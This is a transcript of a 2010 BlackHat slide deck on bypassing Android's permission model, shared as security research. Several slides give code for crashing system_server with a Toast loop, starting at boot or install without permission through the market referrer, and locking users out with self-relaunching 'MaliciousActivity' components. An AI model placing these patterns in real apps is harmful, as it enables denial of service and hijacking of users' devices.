these aren t the permissions you re looking for
play

THESE ARENT THE PERMISSIONS YOURE LOOKING FOR Anthony Lineberry - PowerPoint PPT Presentation

Apr 20, 2023 •291 likes •1.17k views

THESE ARENT THE PERMISSIONS YOURE LOOKING FOR Anthony Lineberry David Luke Richardson Tim Wyatt BlackHat USA 2010 AGENDA Android Internals Overview Security/Permission Model Why Ask For Permission When You Can Ask For

  1. THESE AREN’T THE PERMISSIONS YOU’RE LOOKING FOR Anthony Lineberry David Luke Richardson Tim Wyatt BlackHat USA 2010

  2. AGENDA • Android Internals Overview • Security/Permission Model • Why Ask For Permission When You Can Ask For Forgiveness? • Log-Cat – Our Inside Mole • The Ultimate Permission (Yes, we’re talking about root) • Mitigation

  3. ANDROID INTERNALS Diving Into the Belly of the Beast

  4. ANDROID MANIFEST • AndroidManifest.xml – Every application must have one • Declares the package name, a unique identifier for every app • Describes applications components (Activities, Services, BroadcastReceivers, etc) • Declares requested permissions “needed” to access protected API’s (If only there were a way to get around that...) • Declares permissions other applications are required to have to interact with applications components

  5. ACTIVITY • A way for users to interact with the application • Composed of Views: • Button • TextView • ImageView • etc...

  6. ACTIVITY • Managed as an Activity stack • New/foreground activity on top of stack. In running/active state • Previous Activities below in paused state • Removed from stack when Activity finishes

  7. ACTIVITY • An application can start another application’s Activity! • Activity runs in its application’s process. • Callee doesn’t necessarily have access to Activity’s data • Permission attribute in manifest can restrict who can start the permission

  8. INTENT • “An abstract description of an operation to be performed” • Simple IPC for applications • Intents can be sent with data

  9. INTENT • Can be used to start an Activity with startActivity() • Intents can be broadcast system wide with sendBroadcast() • Communicate with a background Service • Two main components: • Action • Data (URI: http:, content:, geo:, etc...) Intent myIntent = new Intent(Intent.ACTION_VIEW, Uri.parse("http://www.google.com")); startActivity(myIntent);

  10. BROADCAST RECEIVER • Receives an Intent • Can be created dynamically with registerBroadcast() or declared in the manifest with the <receiver> tag • Receives two types of broadcasts: • Normal Broadcasts – Asynchronous; Cannot be aborted • Ordered Broadcasts – Delivered serially; Can be aborted or pass result to next receiver

  11. BROADCAST RECEIVER • Permissions can be enforced • Sender can declare permission for who can receive the Intent • Receiver can declare permission for who can send an Intent to it

  12. SERVICE • Component to do work in the background • NOT a separate process • NOT a thread • Kind of like an Activity without a UI • Can enforce access to service with a required permission

  13. SECURITY/PERMISSION MODEL The Mythical Sandbox

  14. THE SANDBOX • Not a VM sandbox as many believe • Unix multi-user (uid/gid) sandbox! • Each app is a different uid • Lightweight VM running for each process • Breaking out of the VM gains you nothing • Apps can request to share a uid (Both must be signed with the same key)

  15. PERMISSIONS • Default application has no permissions granted • Finer grained access to content/APIs • android.permission.READ_SMS • android.permission.CHANGE_WIFI_STATE • etc.. • Declared in AndroidManifest.xml

  16. WHY ASK FOR PERMISSION WHEN YOU CAN ASK FOR FORGIVENESS?

  17. WHY PERMISSIONS MATTER • Permissions gate what an App can do • Users are required to OK permissions before downloading an App • Users can decipher to some degree whether permissions are appropriate

  18. WHY PERMISSIONS MATTER WHY PERMISSIONS MATTER VS

  19. WHAT DOES 0 PERMISSIONS MEAN? • No permission screen at all! • Straight to download • Why should a user worry about an App Android doesn’t warn about?

  20. REBOOT WITH 0 PERMISSIONS <!-- Required to be able to reboot the device. --> <permission android:name="android.permission.REBOOT" android:label="@string/permlab_reboot" android:description="@string/permdesc_reboot" android:protectionLevel="signatureOrSystem" /> • REBOOT permission is not normally grantable to apps. • Requires SystemOrSignature • But that won’t stop us!

  21. REBOOT WITH 0 PERMISSIONS • There are many approaches depending on Android OS Version • The easiest and most reliable we’ve found so far involves Toast notifications

  22. REBOOT WITH 0 PERMISSIONS while (true) { Toast.makeText(getApplicationContext(), "Hello World", Toast.LENGTH_LONG).show(); } • Every time you try to display a Toast it creates a weak JNI reference in system_server

  23. REBOOT WITH 0 PERMISSIONS D/dalvikvm( 59): GREF has increased to 2001 W/dalvikvm( 59): Last 10 entries in JNI global reference table: W/dalvikvm( 59): 1991: 0x44023668 cls=Ljava/lang/ref/WeakReference; (28 bytes) ... W/dalvikvm( 59): 2000: 0x44019818 cls=Ljava/lang/ref/WeakReference; (36 bytes) W/dalvikvm( 59): JNI global reference table summary (2001 entries): W/dalvikvm( 59): 101 of Ljava/lang/Class; 164B (54 unique) W/dalvikvm( 59): 2 of Ldalvik/system/VMRuntime; 12B (1 unique) W/dalvikvm( 59): 1 of Ljava/lang/String; 28B W/dalvikvm( 59): 1571 of Ljava/lang/ref/WeakReference; 28B (1571 unique) ... W/dalvikvm( 59): Memory held directly by tracked refs is 70248 bytes E/dalvikvm( 59): Excessive JNI global references (2001) E/dalvikvm( 59): VM aborting I/DEBUG ( 31): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** I/DEBUG ( 31): Build fingerprint: 'generic/google_sdk/generic/:2.2/FRF42/36942:eng/test-keys' I/DEBUG ( 31): pid: 59, tid: 218 >>> system_server <<< I/DEBUG ( 31): signal 11 (SIGSEGV), fault addr deadd00d I/DEBUG ( 31): r0 00000374 r1 0000000c r2 0000000c r3 deadd00d I/DEBUG ( 31): r4 00000026 r5 80887fc4 r6 fg fe9181 r7 000007d1 I/DEBUG ( 31): r8 4889bb88 r9 42970f40 10 42970f28 fp 002535f8 I/DEBUG ( 31): ip 808881ec sp 4889bad8 lr afd154c5 pc 8083b162 cpsr 20000030 I/DEBUG ( 31): #00 pc 0003b162 /system/lib/libdvm.so • At 2001* global references system_server SIGSEGVs • Exact number depends on hardware and OS version

  24. REBOOT WITH 0 PERMISSIONS • Custom Toasts are also implementable, which can display any view • Including invisible views! while (true) { // Invisible toast Toast t = new Toast(getApplicationContext()); t.setView(new View(getApplicationContext())); t.show(); }

  25. RECEIVE_BOOT_COMPLETE WITH 0 PERMISSIONS • Permission to “automatically start at boot” • Too easy - The permission isn’t checked! <receiver android:name="AppLauncher"> <intent-filter android:priority="1000"> <action android:name="android.intent.action.BOOT_COMPLETED" /> </intent-filter> </receiver> <!-- Oops! <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETE" /> -->

  26. START ON INSTALL WITH 0 PERMISSIONS • Interesting trick to use in conjunction with another attack • No permission exists to allow this functionality • Google Analytics referrer tracking to the rescue! <!-- Used for install referrer tracking --> <receiver android:name="com.google.android.apps.analytics.AnalyticsReceiver" android:exported="true"> <intent-filter> <action android:name="com.android.vending.INSTALL_REFERRER" /> </intent-filter> </receiver>

  27. START ON INSTALL WITH 0 PERMISSIONS <!-- Used for to launch my app --> <receiver android:name="com.nethack.LaunchOnInstallReceiver"> <intent-filter> <action android:name="com.android.vending.INSTALL_REFERRER" /> </intent-filter> </receiver> • Just write your own Receiver • But there are some caveats...

  28. START ON INSTALL WITH 0 PERMISSIONS • Requires referrer included in URL leading to App market://details?id=com.nethack&referrer=utm_source%3Dadmob • Admob %26utm_medium%3Dbanner%26utm_term%3Darcade%252Bgame %26utm_campaign%3DMalicious_Campaign • Weblink market://details?id=com.nethack&referrer=autostart • OR Android 2.2 • Always includes referrer info market://details? id=com.nethack&referrer=utm_source=androidmarket&utm_medium=devic e& utm_campaign=filtered&utm_content=GAMES/free&rowindex=34

  29. CIRCLE OF DEATH UI HOSTILE TAKEOVER WITH 0 PERMISSIONS • Launch activity that consumes all KeyPresses public boolean onKeyDown(int keyCode, KeyEvent event) { return true; } • Can’t swallow HOME or long press of HOME • Relaunch when Activity exits • Activity can’t launch itself when destroyed, however

  30. CIRCLE OF DEATH WITH 0 PERMISSIONS • So create a circle of death • When Activity is destroyed, launch a Service. Service relaunches destroyed Activity // MaliciousActivity protected void onDestroy() { super.onDestroy(); startService(new Intent(getApplicationContext(), RestartService.class)); } // RestartService public void onCreate() { super.onCreate(); startActivity(new Intent(getApplicationContext(), MaliciousActivity.class) .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)); }

  31. CIRCLE OF DEATH WITH 0 PERMISSIONS • To remove boot into safe mode (No non-system apps are able to run) and uninstall the malicious application. • Bonus points: Maximize volume and play an obnoxious sound.

Recommend

COMP 2718: Permissions: Part 2 By: Dr. Andrew Vardy Adapted from the notes of Dr. Rod Byrne

COMP 2718: Permissions: Part 2 By: Dr. Andrew Vardy Adapted from the notes of Dr. Rod Byrne

COMP 2718: Permissions: Part 2 By: Dr. Andrew Vardy Adapted from the notes of Dr. Rod Byrne Outline Permissions: Part 2 umask - Set Default Permissions Special Permissions Changing Identities su - Run a New Shell as Another

288 views • 11 slides
Teaching Acknowledgement &amp; Permissions Acknowledgement &amp; Permissions Reading/Language

Teaching Acknowledgement &amp; Permissions Acknowledgement &amp; Permissions Reading/Language

Teaching Acknowledgement &amp; Permissions Acknowledgement &amp; Permissions Reading/Language Arts to Several of the slides used in this presentation All Students were originally created by one or more of the following individuals and are

526 views • 26 slides
Abstract Read Permissions Fractional Permissions without the Fractions Alex Summers ETH Zurich

Abstract Read Permissions Fractional Permissions without the Fractions Alex Summers ETH Zurich

Abstract Read Permissions Fractional Permissions without the Fractions Alex Summers ETH Zurich Joint work with : Stefan Heule, Rustan Leino, Peter Mller ETH Zurich Microsoft Research ETH Zurich Overview Verification of

436 views • 42 slides
All About Apps Well cover... Whats an app? What are app permissions? What do

All About Apps Well cover... Whats an app? What are app permissions? What do

All About Apps Well cover... Whats an app? What are app permissions? What do companies gain by getting your permission? Typical permissions requested by apps How to check up on apps already on your phone App safety

134 views • 11 slides
pNFS Access Permissions Check draft-faibish-nfsv4-pnfs-access-permissions-check-03.txt IETF 78

pNFS Access Permissions Check draft-faibish-nfsv4-pnfs-access-permissions-check-03.txt IETF 78

pNFS Access Permissions Check draft-faibish-nfsv4-pnfs-access-permissions-check-03.txt IETF 78 NFSv4 WG Meeting, July 28, 2010 Sorin Faibish sfaibish@emc.com David Black - EMC Mike Eisler - NetApp Jason Glasgow - Google Problem Statement

376 views • 6 slides
Filesystem Hierarchy and Permissions Linux Prepared by Steven Gordon on 19 April 2017

Filesystem Hierarchy and Permissions Linux Prepared by Steven Gordon on 19 April 2017

Linux Filesystem Hierarchy inodes Permissions Filesystem Hierarchy and Permissions Linux Prepared by Steven Gordon on 19 April 2017 Common/Reports/linux-file-permissions.tex, r1417 1/15 Linux Multiuser and Server Operating System

195 views • 15 slides
COMP 2718: Permissions: Part 1 By: Dr. Andrew Vardy Adapted from the notes of Dr. Rod Byrne

COMP 2718: Permissions: Part 1 By: Dr. Andrew Vardy Adapted from the notes of Dr. Rod Byrne

COMP 2718: Permissions: Part 1 By: Dr. Andrew Vardy Adapted from the notes of Dr. Rod Byrne Outline Permissions Owners, Group Members, and Everyone Else Read, Writing, and Executing Digression: Number Systems chmod - Change

280 views • 14 slides
An Overview of Speech Technologies Aren Jansen Thanks to

An Overview of Speech Technologies Aren Jansen Thanks to

An Overview of Speech Technologies Aren Jansen Thanks to Brian Kingsbury (IBM) and Hynek Hermansky (JHU) for some of the materials contained in

803 views • 51 slides
Update Consumer Credit timeline 1 st April applied for interim permissions 1 st May FCA

Update Consumer Credit timeline 1 st April applied for interim permissions 1 st May FCA

Consumer Credit Update Consumer Credit timeline 1 st April applied for interim permissions 1 st May FCA will write to firms giving them a 3mth window for full applications Firms will be able to apply to vary their permissions and use

274 views • 8 slides
Many users aren't aware that the last page Does it have any relationship to the of the user

Many users aren't aware that the last page Does it have any relationship to the of the user

Many users aren't aware that the last page Does it have any relationship to the of the user journey is not counted and will business at all always show zero Is that the right metrics to be focusing on in the first place? Just because it can

326 views • 3 slides
Linux File Permissions Engineering Secure Software Last Revised: August 26, 2020 SWEN-331:

Linux File Permissions Engineering Secure Software Last Revised: August 26, 2020 SWEN-331:

Linux File Permissions Engineering Secure Software Last Revised: August 26, 2020 SWEN-331: Engineering Secure Software Benjamin S Meyers 1 Review: Principle of Least Privilege Every user, thread, process, module needs permissions to run

459 views • 29 slides
Am I a Fiduciary? For ERISA Plans, Non-ERISA Plans, and Plans That Aren't Sure National Tax

Am I a Fiduciary? For ERISA Plans, Non-ERISA Plans, and Plans That Aren't Sure National Tax

Am I a Fiduciary? For ERISA Plans, Non-ERISA Plans, and Plans That Aren't Sure National Tax Sheltered Annuity Association New Orleans February 26 - March 1, 2009 David W. Powell, Principal, Groom Law Group Washington, D.C. First Question -

423 views • 26 slides
JUDGMENT AND DECISION MAKING IN MILITARY CONTEXTS M ARC C ANELLAS *, K AREN F EIGH , P H D, AND R

JUDGMENT AND DECISION MAKING IN MILITARY CONTEXTS M ARC C ANELLAS *, K AREN F EIGH , P H D, AND R

UNCLASSIFIED Marc Canellas Dec. 6, 2016 MORS Experimental Techniques Special Meeting MATHEMATICAL REPRESENTATIONS OF JUDGMENT AND DECISION MAKING IN MILITARY CONTEXTS M ARC C ANELLAS *, K AREN F EIGH , P H D, AND R ACHEL H AGA C

464 views • 33 slides
CSN11121 System Administration and Forensics Week 3 : Users, Permissions, Processes, and Pipes

CSN11121 System Administration and Forensics Week 3 : Users, Permissions, Processes, and Pipes

CSN11121 System Administration and Forensics Week 3 : Users, Permissions, Processes, and Pipes Week 3 : Users, Permissions, Processes, and Pipes Module Leader: Dr Gordon Russell Lecturers: G. Russell, R.Ludwiniak Aliases: CSN11122 (Distance

644 views • 51 slides
These Aren't the COM Objects You're Looking For November, 2018 Victor Ciura Technical Lead,

These Aren't the COM Objects You're Looking For November, 2018 Victor Ciura Technical Lead,

These Aren't the COM Objects You're Looking For November, 2018 Victor Ciura Technical Lead, Advanced Installer www.advancedinstaller.com Abstract Windows COM is 25 years old. Yet it is relevant today more than ever, because Microsoft has bet

1.32k views • 107 slides
Regions and Permissions for Data Invariants Romain Bardou and Claude March e Septembre 2009

Regions and Permissions for Data Invariants Romain Bardou and Claude March e Septembre 2009

Regions and Permissions for Data Invariants Romain Bardou and Claude March e Septembre 2009 Regions and Permissions for Data Invariants 1 / 1 Motivation preservation of data invariants in pointer programs ownership system of Spec#

301 views • 29 slides
Lecture 14 Android Permissions Demystified Adrienne Porter Felt, Erika Chin, Steve Hanna, Dawn

Lecture 14 Android Permissions Demystified Adrienne Porter Felt, Erika Chin, Steve Hanna, Dawn

Lecture 14 Android Permissions Demystified Adrienne Porter Felt, Erika Chin, Steve Hanna, Dawn Song, David Wagner Advanced Operating Systems 9 January, 2013 SOA/OS Lecture No, Android Permissions Demystified 1/41 Introduction Android

422 views • 41 slides
Lecture 08 Android Permissions Demystified Adrienne Porter Felt, Erika Chin, Steve Hanna, Dawn

Lecture 08 Android Permissions Demystified Adrienne Porter Felt, Erika Chin, Steve Hanna, Dawn

Lecture 08 Android Permissions Demystified Adrienne Porter Felt, Erika Chin, Steve Hanna, Dawn Song, David Wagner Operating Systems Practical 20 November, 2013 OSP Lecture 08, Android Permissions Demystified 1/42 Introduction Android

894 views • 42 slides
V erification de programmes avec pointeurs ` a laide de r egions et de permissions

V erification de programmes avec pointeurs ` a laide de r egions et de permissions

INRIA Saclay Universit e de Paris-Sud 11 Ile-de-France Centre dOrsay Equipe ProVal V erification de programmes avec pointeurs ` a laide de r egions et de permissions Romain Bardou pr esent ee le 14 octobre 2011

944 views • 51 slides
Law360 April 23, 2013 5 Arbitration Assumptions That Aren't Always True by Frank E. Emory Jr.

Law360 April 23, 2013 5 Arbitration Assumptions That Aren't Always True by Frank E. Emory Jr.

Law360 April 23, 2013 5 Arbitration Assumptions That Aren't Always True by Frank E. Emory Jr. and Rita Davis, Hunton &amp; Williams LLP Arbitration is often thought to be preferable to litigating in court, and in some circumstances, it may be.

271 views • 4 slides
Teaching g Reading/Language Arts to All Students Tracie Lynn-Zakas tracie.zakas@cms.k12.nc.us

Teaching g Reading/Language Arts to All Students Tracie Lynn-Zakas tracie.zakas@cms.k12.nc.us

Teaching g Reading/Language Arts to All Students Tracie Lynn-Zakas tracie.zakas@cms.k12.nc.us Keri M. Stevenson ksteve40@uncc.edu 1 Acknowledgement &amp; Permissions Acknowledgement &amp; Permissions Acknowledgement &amp; Permissions

1.1k views • 99 slides
Final Presentation May 6, 2011 Brandon Borkholder Mark Dickerson Shefali Garg Aren Knutsen

Final Presentation May 6, 2011 Brandon Borkholder Mark Dickerson Shefali Garg Aren Knutsen

Investment Planning Group (IPG) Final Presentation May 6, 2011 Brandon Borkholder Mark Dickerson Shefali Garg Aren Knutsen Dr. KC Chang, Sponsor Ashirvad Naik, Research Assistant Where Innovation Is Tradition 1 Outline Introduction:

516 views • 50 slides
Ye Year ar 2 Pres esen entatio tion n fo for par aren ents th Jan 24 24 th anua uary

Ye Year ar 2 Pres esen entatio tion n fo for par aren ents th Jan 24 24 th anua uary

tea eaching hing fo for Mas aster ery y in in Ye Year ar 2 Pres esen entatio tion n fo for par aren ents th Jan 24 24 th anua uary y 2020 Mas aster ery y an and the he Na Natio ional nal Curricu riculu lum The

705 views • 38 slides
Set-UID Privileged Programs Need for Privileged Programs Password Dilemma Permissions of

Set-UID Privileged Programs Need for Privileged Programs Password Dilemma Permissions of

Set-UID Privileged Programs Need for Privileged Programs Password Dilemma Permissions of /etc/shadow File: How would normal users change their password? Two-Tier Approach Implementing fine-grained access control in operating

576 views • 31 slides

More recommend